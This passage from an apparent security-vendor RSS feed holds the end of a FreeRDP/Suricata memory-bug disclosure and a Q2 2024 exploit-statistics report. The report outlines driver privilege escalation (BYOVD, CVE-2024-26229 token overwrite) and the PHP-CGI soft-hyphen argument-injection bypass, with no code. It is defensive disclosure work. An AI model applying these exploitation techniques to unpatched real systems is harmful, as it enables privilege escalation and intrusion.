aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113497" class="size-full wp-image-113497" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06.png" alt="Vulnerable code in the 'ncrush_decompress' function:Line 18 – Out-of-bounds read if SrcSize is less than 4." width="746" height="365" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06.png 746w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06-300x147.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06-715x350.png 715w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06-740x362.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133114/Vulnerabilities_in_Suricata_and_FreeRDP_06-572x280.png 572w" sizes="(max-width: 746px) 100vw, 746px" /></a><p id="caption-attachment-113497" class="wp-caption-text">Vulnerable code in the ‘ncrush_decompress’ function:<br />Line 18 – Out-of-bounds read if SrcSize is less than 4.</p></div><p>There are no workarounds for the unpatched versions of the FreeRDP client.</p><h3 id="cve-2024-32460">CVE-2024-32460</h3><p>This is an out-of-bounds read vulnerability in <a href="https://github.com/FreeRDP/FreeRDP/blob/d7ebec5a6524b1da9b90a327329fb5696bdab62c/libfreerdp/codec/interleaved.c#L229-L252" target="_blank" rel="noopener">ExtractRunLengthLiteFgBg</a> function in the Interleaved codec component. It affects FreeRDP clients that use the legacy “GDI” drawing path for transmitting graphics from the remote desktop. This function accepts the pointer to the first element after the allocated buffer and incorrectly handles the ‘buffer_within_range’ helper, causing it to read one byte outside the buffer.</p><div id="attachment_113498" style="width: 563px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113498" class="size-large wp-image-113498" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-553x1024.png" alt="Vulnerable code in the ExtractRunLengthLiteFgBg function:line 11 – 'pbEnd' points to the first byte after the end of buffer;line 26 – the 'ExtractRunLength' function is called with 'pbEnd' as the third parameter;line 51 – the 'ExtractRunLengthLiteFgBg' function is called with 'pbEnd' as a second parameter;line 77 – the 'ExtractRunLengthLiteFgBg' function checks that there is one byte before the end of the buffer;line 82 – the code reads one byte outside of the allocated buffer." width="553" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-553x1024.png 553w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-162x300.png 162w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-768x1422.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-830x1536.png 830w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-189x350.png 189w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-540x1000.png 540w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-151x280.png 151w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07-486x900.png 486w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21133201/Vulnerabilities_in_Suricata_and_FreeRDP_07.png 869w" sizes="(max-width: 553px) 100vw, 553px" /></a><p id="caption-attachment-113498" class="wp-caption-text">Vulnerable code in the <a href="https://github.com/FreeRDP/FreeRDP/blob/d7ebec5a6524b1da9b90a327329fb5696bdab62c/libfreerdp/codec/interleaved.c#L229-L252" target="_blank" rel="noopener">ExtractRunLengthLiteFgBg</a> function:<br />line 11 – ‘pbEnd’ points to the first byte after the end of buffer;<br />line 26 – the ‘ExtractRunLength’ function is called with ‘pbEnd’ as the third parameter;<br />line 51 – the ‘ExtractRunLengthLiteFgBg’ function is called with ‘pbEnd’ as a second parameter;<br />line 77 – the ‘ExtractRunLengthLiteFgBg’ function checks that there is one byte before the end of the buffer;<br />line 82 – the code reads one byte outside of the allocated buffer.</p></div><p>You can find the fix for the vulnerability <a href="https://github.com/FreeRDP/FreeRDP/commit/ecfafe4ad054435d84cb7b111ea73ebd46832fb6" target="_blank" rel="noopener">here</a>. The workaround for unpatched systems could be to use more recent settings such as “/gfx” or “/rfx” if the server supports them. Note that some of the other vulnerabilities in this list affect FreeRDP clients that use “/gfx” as the drawing path.</p><p>We shared our fuzzing tests with the FreeRDP community, along with information about the vulnerabilities that were found. They ran them against various codecs used in the software and found 10 more vulnerabilities in the following components:</p><ul><li>Clear codec</li><li>Color codec</li><li>Interleaved codec</li><li>NSC codec</li><li>ZGFX codec</li></ul><p>Most of these vulnerabilities are out-of-bounds reads that can be used to bypass the ASLR security measure. All of them were fixed in versions 3.5.1 and 2.11.7.</p><h2 id="disclosure-timeline">Disclosure timeline</h2><ul><li>28.03.2024 – We shared information about the vulnerabilities with the Suricata community.</li><li>15.04.2024 – We reported the discovered vulnerabilities to the FreeRDP community.</li><li>16.04.2024 – FreeRDP fixes issued.</li><li>20.04.2024 – Fixes issued for the vulnerabilities discovered by the community using our fuzzer.</li><li>23.04.2024 – Patched Suricata versions issued.</li></ul><h2 id="conclusion">Conclusion</h2><p>The concept of secure by design applies not only to system architecture, but also to the development process itself. Moreover, by testing and trying all the system components prior to release, we were able to help the community fix a range of issues in two widely used open-source projects. We would like to thank the Suricata and FreeRDP maintainers for their quick response to our reports and prompt release of the patches.</p><p>If you use this software, we encourage you to update to the latest versions as soon as possible. At the time of publication, the most up-to-date versions are:</p><ul><li>6.0.20 and 7.0.6 for Suricata;</li><li>2.11.7 and 3.7.0 for FreeRDP.</li></ul>]]></content:encoded> <wfw:commentRss>https://securelist.com/suricata-freerdp-memory-corruption/113489/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/22075412/SL-Suricata-FreeRDP-vulnerabilities-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Exploits and vulnerabilities in Q2 2024</title> <link>https://securelist.com/vulnerability-exploit-report-q2-2024/113455/</link> <comments>https://securelist.com/vulnerability-exploit-report-q2-2024/113455/#respond</comments> <dc:creator><![CDATA[Vitaly Morgunov, Alexander Kolesnikov]]></dc:creator> <pubDate>Wed, 21 Aug 2024 10:00:10 +0000</pubDate> <category><![CDATA[Vulnerability reports]]></category> <category><![CDATA[Drivers]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[Microsoft Exchange]]></category> <category><![CDATA[Microsoft Office]]></category> <category><![CDATA[Microsoft Sharepoint]]></category> <category><![CDATA[Microsoft Windows]]></category> <category><![CDATA[Targeted attacks]]></category> <category><![CDATA[Vulnerabilities]]></category> <category><![CDATA[Vulnerabilities and exploits]]></category> <category><![CDATA[Vulnerability Statistics]]></category> <category><![CDATA[Web app vulnerabilities]]></category> <category><![CDATA[Zero-day vulnerabilities]]></category><category><![CDATA[Vulnerabilities and exploits]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113455</guid> <description><![CDATA[The report contains statistics on vulnerabilities and exploits, with an analysis of interesting vulnerabilities found in Q2 2024.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not have to be fresh, since attackers themselves deliver unpatched drivers to the system. This report considers the statistics of research publications that can be used by cybercriminals to attack target systems, and provides statistical snapshots of vulnerabilities.</p><h2 id="statistics-on-registered-vulnerabilities">Statistics on registered vulnerabilities</h2><p>In this section, we look at statistics on registered vulnerabilities based on data from the <a href="https://www.cve.org/" target="_blank" rel="noopener">cve.org</a> portal.</p><p>In Q2 2024, the number of registered vulnerabilities exceeded last year’s figure for the same period, and is likely to grow further, as some vulnerabilities are not added to the CVE list immediately after registration. This trend is in line with the general uptick in the number of registered vulnerabilities that we noted in our <a href="https://securelist.com/vulnerability-report-q1-2024/112554/" target="_blank" rel="noopener">Q1 report</a>.</p><div class="js-infogram-embed" data-id="_/eovrwyUizZopbBh5w8Lj" data-type="interactive" data-title="01 EN Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Total number of registered vulnerabilities and number of critical ones, Q2 2023 and Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20190348/01-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><p>Comparing the data for the period 2019–2024 we see that in H1 2024 the total number of registered vulnerabilities was slightly less than half of the figure for the whole of 2023. Worth noting is the quarter-on-quarter rise in the number of registered vulnerabilities, for which reason we cannot say for sure that it won’t exceed the 2023 figure by year’s end.</p><div class="js-infogram-embed" data-id="_/ZVv8iyTaJKXWJNcBtAJT" data-type="interactive" data-title="02 EN Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of vulnerabilities and the share of critical ones and of those for which exploits exist, 2019–2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20190446/02-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><p>The chart also shows the share among all registered vulnerabilities of ones that are critical and of ones for which there is a public description or Proof of Concept. The drop in the latter’s share in Q2 illustrates that the number of registered vulnerabilities is growing faster than the number of published exploits for them.</p><p>The share of critical vulnerabilities also decreased slightly relative to 2023. But it is critical vulnerabilities that pose the greatest risk. To understand the risks that organizations may face, and how these risks change over time, let’s look at the types of vulnerabilities that make up the total number of critical CVEs registered in Q2 2023 and Q2 2024.</p><div class="js-infogram-embed" data-id="_/9SZJGmGIxaQKVaJ24ArG" data-type="interactive" data-title="03 EN Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Vulnerability types that critical CVEs registered in Q2 2023 fall under (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20155618/03-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><div class="js-infogram-embed" data-id="_/VSvIqeGpgFUWwtgp4tne" data-type="interactive" data-title="04 EN Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Vulnerability types that critical CVEs registered in Q2 2024 fall under (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20161253/04-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><p>As we see from the charts, even with a CVE entry, most issues remain unclassified and require further investigation to obtain details, which can seriously hamper efforts to protect systems where these vulnerabilities may arise. Besides unclassified critical vulnerabilities, other common issues in Q2 2023 were:</p><ul><li><a href="https://cwe.mitre.org/data/definitions/89.html" target="_blank" rel="noopener"><em>CWE</em>-89</a><em>: Improper Neutralization of Special Elements used in an SQL Command (SQL Injection)</em></li><li><a href="https://cwe.mitre.org/data/definitions/78.html" target="_blank" rel="noopener"><em>CWE</em>-78</a><em>: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)</em></li><li><a href="https://cwe.mitre.org/data/definitions/74.html" target="_blank" rel="noopener">CWE-74</a><em>: Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection)</em></li></ul><p>Other types of vulnerabilities came to the fore in Q2 2024:</p><ul><li><a href="https://cwe.mitre.org/data/definitions/434.html" target="_blank" rel="noopener"><em>CWE</em>-434</a><em>: Unrestricted Upload of File with Dangerous Type</em></li><li><a href="https://cwe.mitre.org/data/definitions/89.html" target="_blank" rel="noopener"><em>CWE</em>-89</a><em>: Improper Neutralization of Special Elements used in an SQL Command (SQL Injection)</em></li><li><a href="https://cwe.mitre.org/data/definitions/89.html" target="_blank" rel="noopener">CWE-22</a><em>: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)</em></li></ul><p>Both lists of the most common types indicate that the vast majority of classified critical vulnerabilities get registered for web applications. According to open-source information, vulnerabilities in web applications are indeed the most critical, since web applications include software that can access sensitive data, such as file-sharing systems, consoles controlling VPN access and cloud and IoT systems.</p><h2 id="vulnerability-exploitation-statistics">Vulnerability exploitation statistics</h2><p>This section presents exploit statistics for Q2 2024 obtained from open sources and our in-house telemetry.</p><p>Exploits are quite expensive software. Their shelf life can be counted in days, even hours. Conversely, creating them is a lengthy process, which varies depending on the type of exploit. Below are statistics on the most popular platforms where users were attacked with exploits.</p><h3 id="windows-and-linux-vulnerability-exploitation">Windows and Linux vulnerability exploitation</h3><p>Since the start of the year, we have seen growth in the number of triggerings of Kaspersky solutions by exploits for Windows, driven primarily by phishing emails and attempts to gain initial access to user systems through vulnerability exploitation. Among the most popular are exploits for vulnerabilities in the Microsoft Office suite:</p><ul><li>CVE-2018-0802 – remote code execution vulnerability in the Equation Editor component</li><li>CVE-2017-11882 – another remote code execution vulnerability in Equation Editor</li><li>CVE-2017-0199 – remote code execution vulnerability in Microsoft Office and WordPad</li><li>CVE-2021-40444 – remote code execution vulnerability in the MSHTML component</li></ul><div class="js-infogram-embed" data-id="_/IhuSdNuyT6j6zUGGVepf" data-type="interactive" data-title="05 EN Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Dynamics of the number of Windows users who encountered exploits, Q1 2023 — Q2 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162442/05-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><p>Note that due to similar detection patterns, exploits classified as CVE-2018-0802 and CVE-2021-40444 may include ones for the vulnerabilities CVE-2022-30190 (remote code execution in the Microsoft Support Diagnostic Tool (MSDT)) and CVE-2023-36884 (remote code execution in the Windows Search component), which also remain a live threat.</p><p>As Linux grows in the corporate segment, it also shows growth in terms of exploits; in contrast to Windows, however, the main exploits for Linux target the kernel:</p><ul><li>CVE-2022-0847 – privilege escalation vulnerability in the Linux kernel</li><li>CVE-2023-2640 – privilege escalation vulnerability in the Ubuntu kernel</li><li>CVE-2021-4034 – privilege escalation vulnerability in the pkexec utility used to execute commands as another user</li></ul><div class="js-infogram-embed" data-id="_/ZoA7YiwrmPR43G3nilmk" data-type="interactive" data-title="06 EN Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Dynamics of the number of Linux users who encountered exploits in Q1 2023 — Q2 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162529/06-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><p>Most exploits for Linux pertain to privilege escalation and can be used to gain persistence and run malicious code in the system. This may be because attackers often target Linux servers for which high privileges are needed to gain control.</p><h3 id="most-common-exploits">Most common exploits</h3><p>Q2 saw a shift in the distribution of critical vulnerabilities for which there are public exploits. See the charts below for a visual comparison of Q1 and Q2.</p><div class="js-infogram-embed" data-id="_/4ymWFhxL5jeMwAhsFu4x" data-type="interactive" data-title="07 EN Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of exploits for critical vulnerabilities by platform, Q1 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162607/07-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><div class="js-infogram-embed" data-id="_/NnCnWRUmnX7tPXGzx9p7" data-type="interactive" data-title="08 EN Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of exploits for critical vulnerabilities by platform, Q2 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20190856/08-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><p>The share of exploits for vulnerabilities in operating systems increased in Q2 against Q1. This is because researchers tend to publish PoCs ahead of the summer season of cybersecurity conferences. Consequently, a great many OS exploits were published in Q2. In addition, the share of exploits for vulnerabilities in Microsoft Sharepoint increased during the reporting period, with almost no new exploits for browsers.</p><h2 id="vulnerability-exploitation-in-apt-attacks">Vulnerability exploitation in APT attacks</h2><p>We analyzed which vulnerabilities are most often used in advanced persistent threats (APTs). The ranking below is based on our telemetry, research and open sources.</p><div id="attachment_113481" style="width: 810px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113481" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data.png" alt="Top 10 vulnerabilities exploited in APT attacks, Q2 2024" width="800" height="743" class="size-full wp-image-113481" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-300x279.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-768x713.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-377x350.png 377w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-740x687.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21073427/09-en-exploit-report-data-301x280.png 301w" sizes="(max-width: 800px) 100vw, 800px" /></a><p id="caption-attachment-113481" class="wp-caption-text">Top 10 vulnerabilities exploited in APT attacks, Q2 2024</p></div><p>Although the list of vulnerabilities common in APT attacks is radically different compared to <a href="https://securelist.com/vulnerability-report-q1-2024/112554/#vulnerability-exploitation-in-apt-attacks" target="_blank" rel="noopener">Q1</a>, attackers most often exploited the same types of software/hardware solutions to gain access to organizations’ internal networks: remote access services, access control mechanisms and office applications. Note that the vulnerabilities of 2024 in this ranking were already being exploited at the time of discovery, that is, they were zero-day vulnerabilities.</p><h2 id="exploiting-vulnerable-drivers-to-attack-operating-systems">Exploiting vulnerable drivers to attack operating systems</h2><p>This section examines public exploits that use vulnerable drivers to attack the Windows operating system and software for it. According to open sources and our own data, there are hundreds of such vulnerable drivers, and new ones are appearing all the time.</p><p>Threat actors use vulnerable drivers as part of the Bring You Own Vulnerable Driver (BYOVD) technique. This involves installing an unpatched driver on the targeted system to ensure the vulnerability is exploited for privilege escalation in the OS or other cybercriminal activity. This method was first used by creators of game cheats, but was later adopted by cybercriminals.</p><p>Since 2023, we have noticed an upward trend in the use of vulnerable drivers to attack Windows with a view to escalating privileges and bypassing security mechanisms. In response, we are systematically adding and improving the mechanisms for detecting and blocking malicious operations through vulnerable drivers in our solutions.</p><h3 id="byovd-attack-tools">BYOVD attack tools</h3><p>Vulnerable drivers themselves are a serious enough problem for OS security, but truly destructive activity requires a client application to pass malicious instructions to the driver.</p><p>Since 2021, we have seen the appearance of 24 online tools for controlling vulnerable drivers in the context of privilege escalation and attacks on privileged processes, such as built-in and third-party security solutions. See below for a year-by-year distribution.</p><div class="js-infogram-embed" data-id="_/to68Td76yrFh5stPs5H7" data-type="interactive" data-title="10 EN-RU-ES Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of tools published online for controlling vulnerable drivers, 2021–2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162713/10-en-ru-es-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><p>As we can see, 2023 was the most abundant year for BYOVD attack tools. And more were published in H1 2024 than in 2021 and 2022 combined. We evaluated the trends of using such software in real attacks, as illustrated by blocked attacks on Kaspersky products in Q1 and Q2 2024:</p><div class="js-infogram-embed" data-id="_/DA5nJnRxqwNrdAGvg07R" data-type="interactive" data-title="11 EN Exploit report data" style="min-height:;"></div><p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Dynamics of the number of users who encountered attacks using vulnerable drivers on Kaspersky products, Q1 and Q2 2024; data for Q1 2024 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20162754/11-en-exploit-report-data.png" target="_blank" rel="noopener">download</a>)</em></p><p>With the rise in the number of BYOVD attacks, developers of tools exploiting vulnerable drivers began to sell them, so we see a downturn in the number of published tools for attacks using vulnerable drivers. However, as mentioned, they continue to be made publicly available.</p><h2 id="interesting-vulnerabilities">Interesting vulnerabilities</h2><p>This section presents information about vulnerabilities of interest that were registered in Q2 2024.</p><h2 id="cve-2024-26169-werkernel-sys">CVE-2024-26169 (WerKernel.sys)</h2><p>Werkernel.sys is a driver for the Windows Error Reporting (WER) subsystem, which handles the sending of error messages. <a href="https://www.cve.org/CVERecord?id=CVE-2024-26169" target="_blank" rel="noopener">CVE-2024-26169</a> is a zero-day vulnerability discovered during the investigation of an incident related to a ransomware attack. It is caused by werkernel.sys using the null security descriptor, which handles the access level. This allows any user to interact with the driver, for example, to rewrite the value of the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WerFault.exe. This key stores data about the application that is responsible for error handling for applications in Windows.</p><p>An examination of the exploitation algorithm reveals the following events:</p><div id="attachment_113465" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113465" class="size-large wp-image-113465" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-1024x562.png" alt="List of events generated by the exploit " width="1024" height="562" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-1024x562.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-300x165.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-768x421.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-638x350.png 638w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-740x406.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-511x280.png 511w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01-800x439.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153053/vulnerability_exploit_report_q2_2024_01.png 1331w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113465" class="wp-caption-text">List of events generated by the exploit</p></div><p>The exploit tries to perform preparatory actions to create special registry keys that allow the executable file specified in the registry to be restarted with SYSTEM user privileges. The exploit itself is based on a race condition vulnerability, so its success depends on the system where it is launched.</p><h2 id="cve-2024-26229-csc-sys">CVE-2024-26229 (csc.sys)</h2><p>Csc.sys is another driver in Windows, this time related to the Windows Client-Side Caching (CSC) service, which handles data caching on the client side. <a href="https://www.cve.org/CVERecord?id=CVE-2024-26229" target="_blank" rel="noopener">CVE-2024-26229</a> is a privilege escalation vulnerability, one that clearly illustrates the problem of insecure code in operating system drivers. Just a few days after the information about this vulnerability was <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26229" target="_blank" rel="noopener">posted on the Microsoft portal</a>, a PoC was released that spread online and was rewritten for various formats and frameworks for penetration testing.</p><p>The exploit is very easy to use and comprises a “classic” combination of the Write primitive (writing to an arbitrary kernel location) and the kernel object address leak primitive.</p><p>The vulnerability is triggered using IOCTL, meaning that the method of communication with the vulnerable driver is in many ways similar to the BYOVD attack method.</p><p>The main algorithm of the exploit aims to modify the PRIMARY_TOKEN structure of the user-run process. This is achieved through the capabilities of the vulnerable driver.</p><h2 id="cve-2024-4577-php-cgi">CVE-2024-4577 (PHP CGI)</h2><p><a href="https://www.cve.org/CVERecord?id=CVE-2024-4577" target="_blank" rel="noopener">CVE-2024-4577</a> stems from bypassing the validation of parameters passed to the web application. Essentially, the vulnerability exists because PHP in CGI mode may not fully validate dangerous characters for pages in some languages. Cybercriminals can use this feature to carry out a standard OS command injection attack.</p><p>The validation problem arises in systems using the following language settings:</p><ul><li>Traditional Chinese (code page 950)</li><li>Simplified Chinese (code page 936)</li><li>Japanese (code page 932)</li></ul><p>Note that CGI mode is not very popular today, but can be found in products such as XAMPP web servers.</p><p>Exploitation of the vulnerability is made possible by the fact that to bypass the filter parameter, it is enough to replace a normal dash with the equivalent of the Unicode symbol “–” (soft hyphen) in writing systems based on Chinese characters. As a result, the query is supplemented with data that can run additional commands. In the process tree, the full exploitation will look as follows:</p><div id="attachment_113466" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113466" class="size-large wp-image-113466" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-1024x107.png" alt="Tree of processes in the victim system during exploitation of CVE-2024-4577" width="1024" height="107" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-1024x107.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-300x31.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-768x80.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-740x77.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02-800x84.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/20153144/vulnerability_exploit_report_q2_2024_02.png 1350w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113466" class="wp-caption-text">Tree of processes in the victim system during exploitation of CVE-2024-4577</p></div><h2 id="takeaways-and-recommendations">Takeaways and recommendations</h2><p>In terms of quality and quantity, vulnerabilities and working exploits for them continue to grow each quarter, and threat actors are finding ways to bring already patched vulnerabilities back to life. One of the main tricks for exploiting closed vulnerabilities is the BYOVD technique, whereby attackers load a vulnerable driver into the system themselves. The wide variety of examples and toolkits in the public domain allow cybercriminals to quickly adapt vulnerable drivers to their needs. Going forward, we will likely only see more active use of this technique in attacks.</p><p>To stay safe, you need to react promptly to the changing threatscape, as well as:</p><ul><li>Understand and monitor your infrastructure thoroughly, paying particular attention to the perimeter; knowing your way around your own infrastructure is vital to keeping it secure.</li><li>Introduce effective patch management to promptly detect and eliminate infrastructure vulnerabilities, including vulnerable drivers slipped into your network by attackers. Our <a href="https://www.kaspersky.com/small-to-medium-business-security/systems-management" target="_blank" rel="noopener">Vulnerability Assessment and Patch Management</a> and <a href="https://www.kaspersky.com/vuln-feed?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d4b451acf916e1c8" target="_blank" rel="noopener">Kaspersky Vulnerability Data Feed</a> solutions could help you with this.</li><li>Use comprehensive security solutions that deliver robust protection of workstations, as well as early detection and prevention of 